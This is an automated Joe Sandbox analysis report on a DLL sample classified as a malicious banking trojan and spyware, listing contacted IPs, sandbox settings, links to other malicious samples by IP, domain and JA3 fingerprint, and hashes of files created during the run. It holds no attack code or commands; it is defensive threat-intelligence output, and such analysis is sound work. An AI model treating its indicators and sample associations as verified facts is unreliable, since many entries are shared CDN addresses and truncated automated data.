                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            34.65.144.159
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                            104.20.184.68
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                            151.101.1.44
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		54113FASTLYUSfalse

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                            Analysis ID:353243
                                                                                                                                                            Start date:15.02.2021
                                                                                                                                                            Start time:21:25:07
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 11m 38s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:light
                                                                                                                                                            Sample file name:NJPcHPuRcG.dll
                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Number of analysed new started processes analysed:39
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:1
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.bank.troj.spyw.evad.winDLL@36/159@18/3
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 22.6% (good quality ratio 21.4%)
                                                                                                                                                            • Quality average: 79.2%
                                                                                                                                                            • Quality standard deviation: 29.1%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 99%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found application associated with file extension: .dll
                                                                                                                                                            Warnings:
                                                                                                                                                            Show All
                                                                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                            • Created / dropped Files have been reduced to 100
                                                                                                                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.139.144, 88.221.62.148, 131.253.33.203, 204.79.197.200, 13.107.21.200, 92.122.213.187, 92.122.213.231, 65.55.44.109, 23.210.250.97, 204.79.197.203, 23.210.248.85, 51.104.139.180, 152.199.19.161, 51.103.5.186, 93.184.221.240, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 20.54.26.129, 52.155.217.156
                                                                                                                                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus16.cloudapp.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, cs9.wpc.v0cdn.net, au.download.windowsupdate.com.edgesuite.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, go.microsoft.com, cs11.wpc.v0cdn.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, a-0003.a-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a767.dscg3.akamai.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, vip2-par02p.wns.notify.trafficmanager.net
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            21:27:01API Interceptor36x Sleep call for process: powershell.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            104.20.184.68DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                                                                                              RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                                                                                                Server.exeGet hashmaliciousBrowse
                                                                                                                                                                  mon48_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                    SecuriteInfo.com.Generic.mg.5db96940e68acc98.dllGet hashmaliciousBrowse
                                                                                                                                                                      Wh102yYa..dllGet hashmaliciousBrowse
                                                                                                                                                                        SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dllGet hashmaliciousBrowse
                                                                                                                                                                          SecuriteInfo.com.Variant.Bulz.349310.24122.dllGet hashmaliciousBrowse
                                                                                                                                                                            acr1.dllGet hashmaliciousBrowse
                                                                                                                                                                              TRIGANOcr.dllGet hashmaliciousBrowse
                                                                                                                                                                                BullGuard.dllGet hashmaliciousBrowse
                                                                                                                                                                                  Jidert.dllGet hashmaliciousBrowse
                                                                                                                                                                                    Vu2QRHVR8C.dllGet hashmaliciousBrowse
                                                                                                                                                                                      header[1].jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                        SimpleAudio.dllGet hashmaliciousBrowse
                                                                                                                                                                                          cSPuZxa7I4.dllGet hashmaliciousBrowse
                                                                                                                                                                                            umAuo1QklZ.dllGet hashmaliciousBrowse
                                                                                                                                                                                              A6C8E866.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                UGPK60taH6.dllGet hashmaliciousBrowse
                                                                                                                                                                                                  usd2.dllGet hashmaliciousBrowse

                                                                                                                                                                                                    Domains

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                    tls13.taboola.map.fastly.netDUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    mon44_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    mon41_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    mon4498.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    e888888888.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    1233.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    Server.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    2200.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    mon48_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    SecuriteInfo.com.Generic.mg.5db96940e68acc98.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    8.prtyok.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    SecuriteInfo.com.Variant.Bulz.349310.9384.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    SecuriteInfo.com.Variant.Razy.840176.14264.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    SecuriteInfo.com.Variant.Bulz.349310.24122.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    login.jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    footer.jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    acr1.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    contextual.media.netDUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 23.210.250.97
                                                                                                                                                                                                    RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 23.210.250.97
                                                                                                                                                                                                    ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 23.210.250.97
                                                                                                                                                                                                    mon44_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 23.210.250.97
                                                                                                                                                                                                    mon41_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 184.30.24.22
                                                                                                                                                                                                    mon4498.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 184.30.24.22
                                                                                                                                                                                                    e888888888.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 23.218.208.23
                                                                                                                                                                                                    1233.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 184.30.24.22
                                                                                                                                                                                                    Server.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 184.30.24.22
                                                                                                                                                                                                    2200.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 184.30.24.22
                                                                                                                                                                                                    mon48_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 184.30.24.22
                                                                                                                                                                                                    SecuriteInfo.com.Generic.mg.5db96940e68acc98.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 92.122.253.103
                                                                                                                                                                                                    Wh102yYa..dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 23.210.250.97
                                                                                                                                                                                                    SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 2.20.86.97
                                                                                                                                                                                                    8.prtyok.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.84.56.24
                                                                                                                                                                                                    SecuriteInfo.com.Variant.Bulz.349310.9384.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.84.56.24
                                                                                                                                                                                                    SecuriteInfo.com.Variant.Razy.840176.14264.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.84.56.24
                                                                                                                                                                                                    SecuriteInfo.com.Variant.Bulz.349310.24122.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.84.56.24
                                                                                                                                                                                                    login.jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.84.56.24
                                                                                                                                                                                                    footer.jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 184.30.24.22

                                                                                                                                                                                                    ASN

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                    GOOGLE-AS-APGoogleAsiaPacificPteLtdSGCompensationClaim-1625519734-02022021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.66.107.230
                                                                                                                                                                                                    CompensationClaim-1625519734-02022021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.66.107.230
                                                                                                                                                                                                    SecuriteInfo.com.BehavesLike.Win32.Emotet.jc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.65.61.179
                                                                                                                                                                                                    CompensationClaim-1828072340-02022021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.66.107.230
                                                                                                                                                                                                    CompensationClaim-1828072340-02022021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.66.107.230
                                                                                                                                                                                                    CompensationClaim-1378529713-02022021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.66.107.230
                                                                                                                                                                                                    CompensationClaim-1378529713-02022021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.66.107.230
                                                                                                                                                                                                    oHqMFmPndx.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.119.201.254
                                                                                                                                                                                                    Documentation__EG382U8V.docGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.67.99.22
                                                                                                                                                                                                    #Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.101.72.248
                                                                                                                                                                                                    #Ud83c#Udfb6 03 November, 2020 prodriguez@fnbsm.com.wavv.htmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.101.72.248
                                                                                                                                                                                                    http://49.120.66.34.bc.googleusercontent.com/osh?email=bob@microsoft.comGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.66.120.49
                                                                                                                                                                                                    SecuriteInfo.com.Heur.13242.docGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.67.97.45
                                                                                                                                                                                                    8845_2020_09_29.docGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.67.97.45
                                                                                                                                                                                                    QgpyVFbQ7w.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.65.231.1
                                                                                                                                                                                                    qySMTADEjr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.65.231.1
                                                                                                                                                                                                    SecuriteInfo.com.Trojan.Siggen10.9113.10424.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.65.231.1
                                                                                                                                                                                                    SecuriteInfo.com.Trojan.Siggen10.9265.86.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.65.231.1
                                                                                                                                                                                                    Dlya sverki 13.07.2020.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.67.67.23
                                                                                                                                                                                                    u17mv3Hf1BdS3fQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 34.66.135.39

                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                    9e10692f1b7f78228b2d4e424db3a98cDUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    7eec14e7cec4dc93fbf53e08998b2340.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    L257MJZ0TP.htmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    brewin-02-02-21 Statement_763108amFtZXMubXV0aW1lcg==.htmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    658908343Bel.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    P178979.htmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    03728d6617cd13b19bd69625f7ead202.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    PO 20191003.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    SecuriteInfo.com.Trojan.GenericKD.36134277.347.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    mon44_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    mon41_cr.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    mon4498.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    e888888888.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    658908343Bel.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    Invoice due.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    One Note celine.wilcox@brewin.co.uk.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44
                                                                                                                                                                                                    #Ud83d#Udcde Herbalife.com AudioMessage_50-74981.htmGet hashmaliciousBrowse
                                                                                                                                                                                                    • 104.20.184.68
                                                                                                                                                                                                    • 151.101.1.44

                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                    Entropy (8bit):2.469670487371862
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                                    MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                                    SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                                    SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                                    SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <root></root>
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2987
                                                                                                                                                                                                    Entropy (8bit):4.950739398644496
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:L7Di7Di7DiRDiRDiRDiRDgvDiRDitiDitiDitiDitiDiaDiaDiaDiaDEzDb/Dian:PccmmmmMvmLLLLNNNN4zXN4zXN4zX7Nz
                                                                                                                                                                                                    MD5:4002DB67F61887BCA5898C7997AC014C
                                                                                                                                                                                                    SHA1:2E587DB846AF0FDCF4D743019F72DB389DAB917F
                                                                                                                                                                                                    SHA-256:AE3EEBB15C9EDF6CF865B12F4A49A1412593CD3D36D644A7AC32ABB299479773
                                                                                                                                                                                                    SHA-512:AD636FC71BF218171A8C4DD62E74F4E698DDB0923BEA8DCC1DA4E7819D20D9F667122A5522645D32F1592C1972BADEAB9B94EC6D57F12E11C34FC54B26E33054
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /><item name="mntest" value="mntest" ltime="1028757264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):89384
                                                                                                                                                                                                    Entropy (8bit):2.192324357918229
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:r01P++6xBuao+I5Cxd8yl5310hRr0pp6Kpf:jnP/36Dwn
                                                                                                                                                                                                    MD5:D420899BEEE44BD14AA77B5D83D105F9
                                                                                                                                                                                                    SHA1:631FA2669185BC3D5BFB987EF86B32F84EBBFE38
                                                                                                                                                                                                    SHA-256:2C35FCB224B152E0F731040DC76B553674B9FFA4D18EA8EC0A4D8D694C5CC462
                                                                                                                                                                                                    SHA-512:B56DB5424E78A3900CE9A595C856BB3743942202154EED7095650907987EABFF65571EB336F1E665D6D5FDA6A7A659660CC05DA50FC8D37159EBF6ADF7FF5488
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{75BD31D4-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):359948
                                                                                                                                                                                                    Entropy (8bit):3.628670384757461
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:8Z/2BfcYmu5kLTzGtHZ/2Bfc/mu5kLTzGt5Z/2BfcYmu5kLTzGtoZ/2Bfc/mu5kF:12xJB
                                                                                                                                                                                                    MD5:2C0FCAD5AFD9BA9EC507824C8ADBE212
                                                                                                                                                                                                    SHA1:66C3D4158ED59F2E89DF1F3C23E4574AC264E141
                                                                                                                                                                                                    SHA-256:88DAFA665A36D0A9F8F19327F642AB2250F02778CB0DF65B1B6672B21556C201
                                                                                                                                                                                                    SHA-512:A30DCF8774E2A3E10445FC6132F92A9D5146DE2DDB23F23069AD7F4E9A0421C67B725F7E342619E48F6C2304C18AD4772371C658A12C042EF75D76EE824148FE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE525F-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):28156
                                                                                                                                                                                                    Entropy (8bit):1.923906601902166
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:riZZQI6ykUjx2NWAMgdhXoVQM4qQilhXoVMXoVQM4qIA:re+TrGgkVchqxjhRqxL
                                                                                                                                                                                                    MD5:3AAEB9337106F1A7AB89D5BCD970658C
                                                                                                                                                                                                    SHA1:377AF013931328C63D11F3F87ED803DC3D665C7D
                                                                                                                                                                                                    SHA-256:2D7B641649F49FCBF183F54816B20EA00AA8B420D6EB47D20986A97C057AD756
                                                                                                                                                                                                    SHA-512:3AE34FE52BF0154F2C793DCDD299144590AF1456FE98C76AB20C8055A88BBEF5C3CE564CF8AFE9BBF9771E2A3F13BAC383D8F7EDFDBE8AEB1CC9E7D88163EC63
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE5261-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):28160
                                                                                                                                                                                                    Entropy (8bit):1.9190881858140454
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:rrZMQT6BBSSjB2+WXMrJfcQC67tyVcjQC67t6A:rrZMQT6BkSjB2+WXMrpc6YVcj6EA
                                                                                                                                                                                                    MD5:BE96385D153AFE49884FA03BDC5CFB96
                                                                                                                                                                                                    SHA1:2A9E7E7EDFBB8ED7008D7BA40411A49620712D8C
                                                                                                                                                                                                    SHA-256:6DFF5555C415C52EFE5112E6B8346D3918DF9FD098F0DB580D7CE00B72067206
                                                                                                                                                                                                    SHA-512:B230CF0DF24E10F399574FB5582054E8A0C973FF4D430B6B8962B9C98C59E3C19DC33302E623E467B28A1BBE4D46DCF83849A4BC1AA3CF5BB220E00041795BF7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE5263-7017-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):28152
                                                                                                                                                                                                    Entropy (8bit):1.922873310389224
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:rWoZ4pQ66QkYjFP2FjWFAMFIxXtirylXsirRA:rWo4OldaQM/eddcn
                                                                                                                                                                                                    MD5:3F2D1D72B7A639775AA6071E31013D5B
                                                                                                                                                                                                    SHA1:30258AB053BE2CCAF1A3B299A44AD4B21761A41F
                                                                                                                                                                                                    SHA-256:447DBBB78248E4E68E531EC6D78F41680632E281DA0B11037B6D1E882F08441F
                                                                                                                                                                                                    SHA-512:23A65E5622267A408E0AA9A35D846306F954CD26B98F0D851DBB162064790B52861B4640B7FF323C3ED17914D03BBE7D8507A195B0D1D892A74B3F37D50E110F
